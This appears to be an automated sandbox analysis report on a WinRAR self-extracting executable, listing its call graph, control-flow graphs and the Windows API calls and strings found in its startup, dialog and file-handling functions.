CatchGuardHandler 5 API calls 24217->24218 24219 b8a62a 24218->24219 24219->24208 24220 b8a599 20 API calls 2 library calls 24219->24220 24220->24210 24221->24208 24222 b6ca2e 24223 b6ca40 __cftof 24222->24223 24226 b723fb 24223->24226 24229 b723bd GetCurrentProcess GetProcessAffinityMask 24226->24229 24230 b6ca97 24229->24230 26110 b7742e 137 API calls __InternalCxxFrameHandler 24232 b7f32b 14 API calls ___delayLoadHelper2@8 26186 b7c316 GetDlgItem EnableWindow ShowWindow SendMessageW 26111 b7b410 GdipDisposeImage GdipFree 24237 b8d211 31 API calls CatchGuardHandler 24427 b80612 24428 b8061e ___scrt_is_nonwritable_in_current_image 24427->24428 24459 b801ac 24428->24459 24430 b80778 24536 b80a0a 4 API calls 2 library calls 24430->24536 24432 b80625 24432->24430 24434 b8064f 24432->24434 24433 b8077f 24529 b8931a 24433->24529 24446 b8068e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24434->24446 24470 b89ebd 24434->24470 24441 b8066e 24443 b806ef 24478 b80b25 GetStartupInfoW __cftof 24443->24478 24445 b806f5 24479 b89e0e 51 API calls 24445->24479 24446->24443 24532 b88e0c 38 API calls _abort 24446->24532 24449 b806fd 24480 b7f05c 24449->24480 24453 b80711 24453->24433 24454 b80715 24453->24454 24455 b8071e 24454->24455 24534 b892bd 28 API calls _abort 24454->24534 24535 b8031d 12 API calls ___scrt_uninitialize_crt 24455->24535 24458 b80726 24458->24441 24460 b801b5 24459->24460 24538 b80826 IsProcessorFeaturePresent 24460->24538 24462 b801c1 24539 b83bee 24462->24539 24464 b801c6 24469 b801ca 24464->24469 24547 b89d47 24464->24547 24467 b801e1 24467->24432 24469->24432 24473 b89ed4 24470->24473 24471 b80d7c CatchGuardHandler 5 API calls 24472 b80668 24471->24472 24472->24441 24474 b89e61 24472->24474 24473->24471 24476 b89e90 24474->24476 24475 b80d7c CatchGuardHandler 5 API calls 24477 b89eb9 24475->24477 24476->24475 24477->24446 24478->24445 24479->24449 24638 b71b83 24480->24638 24484 b7f07c 24687 b7bd1b 24484->24687 24486 b7f085 __cftof 24487 b7f098 GetCommandLineW 24486->24487 24488 b7f13c GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24487->24488 24489 b7f0ab 24487->24489 24491 b64a20 _swprintf 51 API calls 24488->24491 24691 b7d708 24489->24691 24493 b7f1a3 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24491->24493 24702 b7c8cd LoadBitmapW 24493->24702 24494 b7f136 24696 b7ed2e 24494->24696 24495 b7f0b9 OpenFileMappingW 24498 b7f0d1 MapViewOfFile 24495->24498 24499 b7f12d CloseHandle 24495->24499 24501 b7f126 UnmapViewOfFile 24498->24501 24502 b7f0e2 __InternalCxxFrameHandler 24498->24502 24499->24488 24501->24499 24507 b7ed2e 2 API calls 24502->24507 24509 b7f0fe 24507->24509 24508 b7a0d7 27 API calls 24510 b7f203 DialogBoxParamW 24508->24510 24732 b7069c 82 API calls 24509->24732 24515 b7f23d 24510->24515 24512 b7f112 24733 b70752 82 API calls _wcslen 24512->24733 24514 b7f11d 24514->24501 24516 b7f256 24515->24516 24517 b7f24f Sleep 24515->24517 24519 b7f264 24516->24519 24734 b7bfb3 CompareStringW SetCurrentDirectoryW __cftof _wcslen 24516->24734 24517->24516 24520 b7f283 DeleteObject 24519->24520 24521 b7f29f 24520->24521 24522 b7f298 DeleteObject 24520->24522 24523 b7f2e2 24521->24523 24524 b7f2d0 24521->24524 24522->24521 24729 b7bd81 24523->24729 24735 b7ed8b 6 API calls 24524->24735 24527 b7f2d6 CloseHandle 24527->24523 24528 b7f31c 24533 b80b5b GetModuleHandleW 24528->24533 24954 b89097 24529->24954 24532->24443 24533->24453 24534->24455 24535->24458 24536->24433 24538->24462 24551 b84c97 24539->24551 24542 b83bf7 24542->24464 24544 b83bff 24545 b83c0a 24544->24545 24565 b84cd3 DeleteCriticalSection 24544->24565 24545->24464 24592 b8d21a 24547->24592 24550 b83c0d 7 API calls 2 library calls 24550->24469 24552 b84ca0 24551->24552 24554 b84cc9 24552->24554 24555 b83bf3 24552->24555 24566 b84edc 24552->24566 24571 b84cd3 DeleteCriticalSection 24554->24571 24555->24542 24557 b83d1c 24555->24557 24585 b84ded 24557->24585 24560 b83d31 24560->24544 24562 b83d3f 24563 b83d4c 24562->24563 24591 b83d4f 6 API calls ___vcrt_FlsFree 24562->24591 24563->24544 24565->24542 24572 b84d02 24566->24572 24569 b84f14 InitializeCriticalSectionAndSpinCount 24570 b84eff 24569->24570 24570->24552 24571->24555 24573 b84d23 24572->24573 24574 b84d1f 24572->24574 24573->24574 24575 b84d8b GetProcAddress 24573->24575 24578 b84d7c 24573->24578 24580 b84da2 LoadLibraryExW 24573->24580 24574->24569 24574->24570 24575->24574 24577 b84d99 24575->24577 24577->24574 24578->24575 24579 b84d84 FreeLibrary 24578->24579 24579->24575 24581 b84db9 GetLastError 24580->24581 24582 b84de9 24580->24582 24581->24582 24583 b84dc4 ___vcrt_FlsGetValue 24581->24583 24582->24573 24583->24582 24584 b84dda LoadLibraryExW 24583->24584 24584->24573 24586 b84d02 ___vcrt_FlsGetValue 5 API calls 24585->24586 24587 b84e07 24586->24587 24588 b84e20 TlsAlloc 24587->24588 24589 b83d26 24587->24589 24589->24560 24590 b84e9e 6 API calls ___vcrt_FlsGetValue 24589->24590 24590->24562 24591->24560 24595 b8d237 24592->24595 24596 b8d233 24592->24596 24593 b80d7c CatchGuardHandler 5 API calls 24594 b801d3 24593->24594 24594->24467 24594->24550 24595->24596 24598 b8b860 24595->24598 24596->24593 24599 b8b86c ___scrt_is_nonwritable_in_current_image 24598->24599 24610 b8bdf1 EnterCriticalSection 24599->24610 24601 b8b873 24611 b8d6e8 24601->24611 24603 b8b882 24609 b8b891 24603->24609 24624 b8b6e9 29 API calls 24603->24624 24606 b8b88c 24625 b8b79f GetStdHandle GetFileType 24606->24625 24608 b8b8a2 _abort 24608->24595 24626 b8b8ad LeaveCriticalSection _abort 24609->24626 24610->24601 24612 b8d6f4 ___scrt_is_nonwritable_in_current_image 24611->24612 24613 b8d718 24612->24613 24614 b8d701 24612->24614 24627 b8bdf1 EnterCriticalSection 24613->24627 24635 b8a7eb 20 API calls _abort 24614->24635 24617 b8d706 24636 b851b9 26 API calls _abort 24617->24636 24619 b8d750 24637 b8d777 LeaveCriticalSection _abort 24619->24637 24620 b8d710 _abort 24620->24603 24621 b8d724 24621->24619 24628 b8d639 24621->24628 24624->24606 24625->24609 24626->24608 24627->24621 24629 b8c2f6 _abort 20 API calls 24628->24629 24631 b8d64b 24629->24631 24630 b8d658 24632 b8a66a _free 20 API calls 24630->24632 24631->24630 24633 b8c0ca 11 API calls 24631->24633 24634 b8d6aa 24632->24634 24633->24631 24634->24621 24635->24617 24636->24620 24637->24620 24639 b7ffd0 24638->24639 24640 b71b8d GetModuleHandleW 24639->24640 24641 b71c07 24640->24641 24642 b71ba8 GetProcAddress 24640->24642 24643 b71f34 GetModuleFileNameW 24641->24643 24745 b889ee 42 API calls 2 library calls 24641->24745 24644 b71bc1 24642->24644 24645 b71bd9 GetProcAddress 24642->24645 24654 b71f52 24643->24654 24644->24645 24647 b71beb 24645->24647 24647->24641 24648 b71e74 24648->24643 24649 b71e7f GetModuleFileNameW CreateFileW 24648->24649 24650 b71eaf SetFilePointer 24649->24650 24651 b71f28 CloseHandle 24649->24651 24650->24651 24652 b71ebd ReadFile 24650->24652 24651->24643 24652->24651 24656 b71edb 24652->24656 24657 b71fb4 GetFileAttributesW 24654->24657 24658 b71fcc 24654->24658 24660 b71f7d CompareStringW 24654->24660 24736 b6c619 24654->24736 24739 b71b3b 24654->24739 24656->24651 24659 b71b3b 2 API calls 24656->24659 24657->24654 24657->24658 24661 b71fd7 24658->24661 24664 b7200c 24658->24664 24659->24656 24660->24654 24663 b71ff0 GetFileAttributesW 24661->24663 24665 b72008 24661->24665 24662 b7211b 24686 b7b65d GetCurrentDirectoryW 24662->24686 24663->24661 24663->24665 24664->24662 24666 b6c619 GetVersionExW 24664->24666 24665->24664 24667 b72026 24666->24667 24668 b72093 24667->24668 24669 b7202d 24667->24669 24671 b64a20 _swprintf 51 API calls 24668->24671 24670 b71b3b 2 API calls 24669->24670 24673 b72037 24670->24673 24672 b720bb AllocConsole 24671->24672 24674 b72113 ExitProcess 24672->24674 24675 b720c8 GetCurrentProcessId AttachConsole 24672->24675 24676 b71b3b 2 API calls 24673->24676 24750 b84fa3 24675->24750 24678 b72041 24676->24678 24746 b6f937 24678->24746 24679 b720e9 GetStdHandle WriteConsoleW Sleep FreeConsole 24679->24674 24682 b64a20 _swprintf 51 API calls 24683 b7206f 24682->24683 24684 b6f937 53 API calls 24683->24684 24685 b7207e 24684->24685 24685->24674 24686->24484 24688 b71b3b 2 API calls 24687->24688 24689 b7bd2f OleInitialize 24688->24689 24690 b7bd52 GdiplusStartup SHGetMalloc 24689->24690 24690->24486 24695 b7d712 24691->24695 24692 b7d828 24692->24494 24692->24495 24694 b73307 CharUpperW 24694->24695 24695->24692 24695->24694 24775 b70752 82 API calls _wcslen 24695->24775 24697 b7ffd0 24696->24697 24698 b7ed3b SetEnvironmentVariableW 24697->24698 24700 b7ed5e 24698->24700 24699 b7ed86 24699->24488 24700->24699 24701 b7ed7a SetEnvironmentVariableW 24700->24701 24701->24699 24703 b7c8ee 24702->24703 24704 b7c8fb GetObjectW 24702->24704 24781 b7b6d2 FindResourceW 24703->24781 24706 b7c90a 24704->24706 24776 b7b5d6 24706->24776 24710 b7c960 24721 b6ed62 24710->24721 24711 b7c93c 24795 b7b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24711->24795 24712 b7b6d2 12 API calls 24714 b7c92d 24712->24714 24714->24711 24716 b7c933 DeleteObject 24714->24716 24715 b7c944 24796 b7b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24715->24796 24716->24711 24718 b7c94d 24797 b7b81c 8 API calls 24718->24797 24720 b7c954 DeleteObject 24720->24710 24808 b6ed87 24721->24808 24726 b7a0d7 24937 b7febe 24726->24937 24728 b7a0f6 24728->24508 24730 b7bdb0 GdiplusShutdown OleUninitialize 24729->24730 24730->24528 24732->24512 24733->24514 24734->24519 24735->24527 24737 b6c62d GetVersionExW 24736->24737 24738 b6c669 24736->24738 24737->24738 24738->24654 24740 b7ffd0 24739->24740 24741 b71b48 GetSystemDirectoryW 24740->24741 24742 b71b60 24741->24742 24743 b71b7e 24741->24743 24744 b71b71 LoadLibraryW 24742->24744 24743->24654 24744->24743 24745->24648 24747 b6f947 24746->24747 24752 b6f968 24747->24752 24751 b84fab 24750->24751 24751->24679 24751->24751 24758 b6ecd0 24752->24758 24755 b6f965 24755->24682 24756 b6f98b LoadStringW 24756->24755 24757 b6f9a2 LoadStringW 24756->24757 24757->24755 24763 b6ec0c 24758->24763 24760 b6eced 24761 b6ed02 24760->24761 24771 b6ed10 26 API calls 24760->24771 24761->24755 24761->24756 24764 b6ec24 24763->24764 24770 b6eca4 _strncpy 24763->24770 24766 b6ec48 24764->24766 24772 b730f5 WideCharToMultiByte 24764->24772 24769 b6ec79 24766->24769 24773 b6f8d1 50 API calls __vsnprintf 24766->24773 24774 b87571 26 API calls 3 library calls 24769->24774 24770->24760 24771->24761 24772->24766 24773->24769 24774->24770 24775->24695 24798 b7b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24776->24798 24778 b7b5dd 24779 b7b5e9 24778->24779 24799 b7b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24778->24799 24779->24710 24779->24711 24779->24712 24782 b7b6f5 SizeofResource 24781->24782 24783 b7b7e3 24781->24783 24782->24783 24784 b7b70c LoadResource 24782->24784 24783->24704 24783->24706 24784->24783 24785 b7b721 LockResource 24784->24785 24785->24783 24786 b7b732 GlobalAlloc 24785->24786 24786->24783 24787 b7b74d GlobalLock 24786->24787 24788 b7b7dc GlobalFree 24787->24788 24789 b7b75c __InternalCxxFrameHandler 24787->24789 24788->24783 24790 b7b7d5 GlobalUnlock 24789->24790 24800 b7b636 GdipAlloc 24789->24800 24790->24788 24793 b7b7c0 24793->24790 24794 b7b7aa GdipCreateHBITMAPFromBitmap 24794->24793 24795->24715 24796->24718 24797->24720 24798->24778 24799->24779 24801 b7b655 24800->24801 24802 b7b648 24800->24802 24801->24790 24801->24793 24801->24794 24804 b7b3c8 24802->24804 24805 b7b3f0 GdipCreateBitmapFromStream 24804->24805 24806 b7b3e9 GdipCreateBitmapFromStreamICM 24804->24806 24807 b7b3f5 24805->24807 24806->24807 24807->24801 24809 b6ed95 __EH_prolog 24808->24809 24810 b6edc4 GetModuleFileNameW 24809->24810 24811 b6edf5 24809->24811 24812 b6edde 24810->24812 24854 b6ab40 24811->24854 24812->24811 24814 b6ee51 24865 b87730 24814->24865 24816 b6f581 78 API calls 24819 b6ee25 24816->24819 24819->24814 24819->24816 24845 b6f06a 24819->24845 24820 b6ee64 24821 b87730 26 API calls 24820->24821 24824 b6ee76 ___vcrt_FlsGetValue 24821->24824 24829 b6efa5 24824->24829 24824->24845 24879 b6b110 24824->24879 24895 b6ae60 24824->24895 24900 b6b000 81 API calls 24824->24900 24826 b6efbf ___std_exception_copy 24827 b6ae60 82 API calls 24826->24827 24826->24845 24830 b6efe8 ___std_exception_copy 24827->24830 24829->24845 24901 b6b000 81 API calls 24829->24901 24830->24845 24849 b6eff3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 24830->24849 24902 b72ed2 MultiByteToWideChar 24830->24902 24832 b6f479 24837 b6f4fe 24832->24837 24908 b8a09e 26 API calls 2 library calls 24832->24908 24834 b6f48e 24909 b88a18 26 API calls 2 library calls 24834->24909 24836 b6f534 24842 b87730 26 API calls 24836->24842 24837->24836 24841 b6f581 78 API calls 24837->24841 24839 b6f4e6 24910 b6f59c 78 API calls 24839->24910 24841->24837 24843 b6f54d 24842->24843 24844 b87730 26 API calls 24843->24844 24844->24845 24888 b6a801 24845->24888 24847 b730f5 WideCharToMultiByte 24847->24849 24849->24832 24849->24845 24849->24847 24903 b6f8d1 50 API calls __vsnprintf 24849->24903 24904 b87571 26 API calls 3 library calls 24849->24904 24905 b8a09e 26 API calls 2 library calls 24849->24905 24906 b88a18 26 API calls 2 library calls 24849->24906 24907 b6f59c 78 API calls 24849->24907 24852 b6f5be GetModuleHandleW FindResourceW 24853 b6ed75 24852->24853 24853->24726 24855 b6ab4a 24854->24855 24856 b6abab CreateFileW 24855->24856 24857 b6abcc GetLastError 24856->24857 24858 b6ac1b 24856->24858 24859 b6cf32 GetCurrentDirectoryW 24857->24859 24862 b6ac5f 24858->24862 24864 b6ac45 SetFileTime 24858->24864 24860 b6abec 24859->24860 24860->24858 24861 b6abf0 CreateFileW GetLastError 24860->24861 24861->24858 24863 b6ac15 24861->24863 24862->24819 24863->24858 24864->24862 24866 b87769 24865->24866 24867 b8776d 24866->24867 24878 b87795 24866->24878 24911 b8a7eb 20 API calls _abort 24867->24911 24869 b87772 24912 b851b9 26 API calls _abort 24869->24912 24870 b87ab9 24872 b80d7c CatchGuardHandler 5 API calls 24870->24872 24874 b87ac6 24872->24874 24873 b8777d 24875 b80d7c CatchGuardHandler 5 API calls 24873->24875 24874->24820 24877 b87789 24875->24877 24877->24820 24878->24870 24913 b87650 5 API calls CatchGuardHandler 24878->24913 24880 b6b122 24879->24880 24881 b6b135 24879->24881 24882 b6b140 24880->24882 24914 b67800 77 API calls 24880->24914 24881->24882 24884 b6b148 SetFilePointer 24881->24884 24882->24824 24884->24882 24885 b6b164 GetLastError 24884->24885 24885->24882 24886 b6b16e 24885->24886 24886->24882 24915 b67800 77 API calls 24886->24915 24889 b6a825 24888->24889 24894 b6a836 24888->24894 24890 b6a831 24889->24890 24891 b6a838 24889->24891 24889->24894 24916 b6a9ae 24890->24916 24921 b6a880 24891->24921 24894->24852 24896 b6ae6c 24895->24896 24898 b6ae73 24895->24898 24896->24824 24898->24896 24899 b6a9e5 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24898->24899 24936 b677bd 77 API calls 24898->24936 24899->24898 24900->24824 24901->24826 24902->24849 24903->24849 24904->24849 24905->24849 24906->24849 24907->24849 24908->24834 24909->24839 24910->24837 24911->24869 24912->24873 24913->24878 24914->24881 24915->24882 24917 b6a9b7 24916->24917 24918 b6a9e1 24916->24918 24917->24918 24927 b6b470 24917->24927 24918->24894 24922 b6a8aa 24921->24922 24923 b6a88c 24921->24923 24924 b6a8c9 24922->24924 24935 b67685 76 API calls 24922->24935 24923->24922 24925 b6a898 FindCloseChangeNotification 24923->24925 24924->24894 24925->24922 24928 b7ffd0 24927->24928 24929 b6b47d DeleteFileW 24928->24929 24930 b6b490 24929->24930 24931 b6a9df 24929->24931 24932 b6cf32 GetCurrentDirectoryW 24930->24932 24931->24894 24933 b6b4a4 24932->24933 24933->24931 24934 b6b4a8 DeleteFileW 24933->24934 24934->24931 24935->24924 24936->24898 24938 b7fec3 ___std_exception_copy 24937->24938 24939 b7fedd 24938->24939 24941 b7fedf 24938->24941 24952 b88e5c 7 API calls 2 library calls 24938->24952 24939->24728 24942 b648f5 Concurrency::cancel_current_task 24941->24942 24944 b7fee9 24941->24944 24950 b83340 RaiseException 24942->24950 24953 b83340 RaiseException 24944->24953 24945 b64911 24948 b64927 24945->24948 24951 b6136b 26 API calls Concurrency::cancel_current_task 24945->24951 24947 b80820 24948->24728 24950->24945 24951->24948 24952->24938 24953->24947 24955 b890a3 _abort 24954->24955 24956 b890aa 24955->24956 24957 b890bc 24955->24957 24990 b891f1 GetModuleHandleW 24956->24990 24978 b8bdf1 EnterCriticalSection 24957->24978 24960 b890af 24960->24957 24991 b89235 GetModuleHandleExW 24960->24991 24963 b89138 24966 b89150 24963->24966 24972 b89e61 _abort 5 API calls 24963->24972 24973 b89e61 _abort 5 API calls 24966->24973 24967 b891aa 25000 b93550 5 API calls CatchGuardHandler 24967->25000 24968 b8917e 24982 b891b0 24968->24982 24972->24966 24977 b89161 24973->24977 24974 b890c3 24974->24963 24974->24977 24999 b89bb0 20 API calls _abort 24974->24999 24979 b891a1 24977->24979 24978->24974 25001 b8be41 LeaveCriticalSection 24979->25001 24981 b8917a 24981->24967 24981->24968 25002 b8c236 24982->25002 24985 b891de 24988 b89235 _abort 8 API calls 24985->24988 24986 b891be GetPEB 24986->24985 24987 b891ce GetCurrentProcess TerminateProcess 24986->24987 24987->24985 24989 b891e6 ExitProcess 24988->24989 24990->24960 24992 b8925f GetProcAddress 24991->24992 24993 b89282 24991->24993 24994 b89274 24992->24994 24995 b89288 FreeLibrary 24993->24995 24996 b89291 24993->24996 24994->24993 24995->24996 24997 b80d7c CatchGuardHandler 5 API calls 24996->24997 24998 b890bb 24997->24998 24998->24957 24999->24963 25001->24981 25003 b8c25b 25002->25003 25007 b8c251 25002->25007 25004 b8be58 _abort 5 API calls 25003->25004 25004->25007 25005 b80d7c CatchGuardHandler 5 API calls 25006 b891ba 25005->25006 25006->24985 25006->24986 25007->25005 25010 b7f002 25011 b7f00f 25010->25011 25012 b6f937 53 API calls 25011->25012 25013 b7f01c 25012->25013 25014 b64a20 _swprintf 51 API calls 25013->25014 25015 b7f031 SetDlgItemTextW 25014->25015 25018 b7c758 PeekMessageW 25015->25018 25019 b7c773 GetMessageW 25018->25019 25020 b7c7ac 25018->25020 25021 b7c789 IsDialogMessageW 25019->25021 25022 b7c798 TranslateMessage DispatchMessageW 25019->25022 25021->25020 25021->25022 25022->25020 26112 b61800 86 API calls Concurrency::cancel_current_task 26164 b80600 27 API calls 26142 b93100 CloseHandle 25027 b6b20a 25028 b6b21f 25027->25028 25029 b6b218 25027->25029 25030 b6b22c GetStdHandle 25028->25030 25037 b6b23b 25028->25037 25030->25037 25031 b6b293 WriteFile 25031->25037 25032 b6b264 WriteFile 25033 b6b25f 25032->25033 25032->25037 25033->25032 25033->25037 25035 b6b325 25039 b67951 77 API calls 25035->25039 25037->25029 25037->25031 25037->25032 25037->25033 25037->25035 25038 b6765a 78 API calls 25037->25038 25038->25037 25039->25029 26189 b72f0b GetCPInfo IsDBCSLeadByte 26114 b61075 44 API calls 26144 b62570 96 API calls 26165 b7fe61 48 API calls _unexpected 26116 b7c460 99 API calls 26166 b8b660 71 API calls _free 26167 b91a60 IsProcessorFeaturePresent 26168 b8c65d 6 API calls CatchGuardHandler 26119 b6a850 80 API calls Concurrency::cancel_current_task 26120 b7b450 GdipCloneImage GdipAlloc 26190 b7e750 70 API calls 26149 b81550 51 API calls 2 library calls 26083 b7fd58 26084 b7fd62 26083->26084 26085 b7f9e9 ___delayLoadHelper2@8 14 API calls 26084->26085 26086 b7fd6f 26085->26086 26151 b7a540 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 26152 b80540 46 API calls __RTC_Initialize 26192 b80747 29 API calls _abort

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00B71B83: GetModuleHandleW.KERNEL32(kernel32), ref: 00B71B9C
                      • Part of subcall function 00B71B83: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B71BAE
                      • Part of subcall function 00B71B83: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B71BDF
                      • Part of subcall function 00B7B65D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B7B665
                      • Part of subcall function 00B7BD1B: OleInitialize.OLE32(00000000), ref: 00B7BD34
                      • Part of subcall function 00B7BD1B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B7BD6B
                      • Part of subcall function 00B7BD1B: SHGetMalloc.SHELL32(00BAA460), ref: 00B7BD75
                    • GetCommandLineW.KERNEL32 ref: 00B7F09B
                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B7F0C5
                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00B7F0D6
                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00B7F127
                      • Part of subcall function 00B7ED2E: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B7ED44
                      • Part of subcall function 00B7ED2E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B7ED80
                      • Part of subcall function 00B70752: _wcslen.LIBCMT ref: 00B70776
                    • CloseHandle.KERNEL32(00000000), ref: 00B7F12E
                    • GetModuleFileNameW.KERNEL32(00000000,00BC0CC0,00000800), ref: 00B7F148
                    • SetEnvironmentVariableW.KERNEL32(sfxname,00BC0CC0), ref: 00B7F154
                    • GetLocalTime.KERNEL32(?), ref: 00B7F15F
                    • _swprintf.LIBCMT ref: 00B7F19E
                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B7F1B3
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00B7F1BA
                    • LoadIconW.USER32(00000000,00000064), ref: 00B7F1D1
                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9D0,00000000), ref: 00B7F222
                    • Sleep.KERNEL32(?), ref: 00B7F250
                    • DeleteObject.GDI32 ref: 00B7F289
                    • DeleteObject.GDI32(?), ref: 00B7F299
                    • CloseHandle.KERNEL32 ref: 00B7F2DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                    • API String ID: 3014515783-3710569615
                    • Opcode ID: 1a474702e9c3b54d5dd13755503590f0b096704f7f6e9c716ba5d45411724cc7
                    • Instruction ID: 8b164aa832feefb153035a545bd3ebd559244895e7c95cfc1dbb0940603dcd21
                    • Opcode Fuzzy Hash: 1a474702e9c3b54d5dd13755503590f0b096704f7f6e9c716ba5d45411724cc7
                    • Instruction Fuzzy Hash: EF61E571504310ABC321BB65EC4AF7B7BECEB4A744F0044AAF559E32A2DF749944CB61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1022 b6ba94-b6bab8 call b7ffd0 1025 b6bb20-b6bb29 FindNextFileW 1022->1025 1026 b6baba-b6bac7 FindFirstFileW 1022->1026 1027 b6bb3b-b6bbf8 call b7192f call b6d71d call b72924 * 3 1025->1027 1028 b6bb2b-b6bb39 GetLastError 1025->1028 1026->1027 1029 b6bac9-b6badb call b6cf32 1026->1029 1033 b6bbfd-b6bc0a 1027->1033 1030 b6bb12-b6bb1b 1028->1030 1037 b6baf7-b6bb00 GetLastError 1029->1037 1038 b6badd-b6baf5 FindFirstFileW 1029->1038 1030->1033 1039 b6bb02-b6bb05 1037->1039 1040 b6bb10 1037->1040 1038->1027 1038->1037 1039->1040 1042 b6bb07-b6bb0a 1039->1042 1040->1030 1042->1040 1044 b6bb0c-b6bb0e 1042->1044 1044->1030
                    APIs
                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BABD
                      • Part of subcall function 00B6CF32: _wcslen.LIBCMT ref: 00B6CF56
                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BAEB
                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BAF7
                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BB21
                    • GetLastError.KERNEL32(?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BB2D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                    • String ID:
                    • API String ID: 42610566-0
                    • Opcode ID: 471582f8987fb1c25e093c555e71963ab6fc2279d57d513f6d12de4449a42030
                    • Instruction ID: 034c66a95b373b679c2a805e1c2603c2a33522a2ccf2cec698593e6217e2d319
                    • Opcode Fuzzy Hash: 471582f8987fb1c25e093c555e71963ab6fc2279d57d513f6d12de4449a42030
                    • Instruction Fuzzy Hash: E1415D72A00519ABCB25DF64CC94EE9B3F8FB48350F1446A6E56DE3200D734AE95CF90
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B692CB
                      • Part of subcall function 00B6D656: _wcsrchr.LIBVCRUNTIME ref: 00B6D660
                      • Part of subcall function 00B6CAA0: _wcslen.LIBCMT ref: 00B6CAA6
                      • Part of subcall function 00B71907: _wcslen.LIBCMT ref: 00B7190D
                      • Part of subcall function 00B6B5D6: _wcslen.LIBCMT ref: 00B6B5E2
                      • Part of subcall function 00B6B5D6: __aulldiv.LIBCMT ref: 00B6B60E
                      • Part of subcall function 00B6B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00B6B615
                      • Part of subcall function 00B6B5D6: _swprintf.LIBCMT ref: 00B6B640
                      • Part of subcall function 00B6B5D6: _wcslen.LIBCMT ref: 00B6B64A
                      • Part of subcall function 00B6B5D6: _swprintf.LIBCMT ref: 00B6B6A0
                      • Part of subcall function 00B6B5D6: _wcslen.LIBCMT ref: 00B6B6AA
                      • Part of subcall function 00B64727: __EH_prolog.LIBCMT ref: 00B6472C
                      • Part of subcall function 00B6A212: __EH_prolog.LIBCMT ref: 00B6A217
                      • Part of subcall function 00B6B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B8FA
                      • Part of subcall function 00B6B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B92B
                    Strings
                    • __tmp_reference_source_, xrefs: 00B69596
                    Memory Dump Source
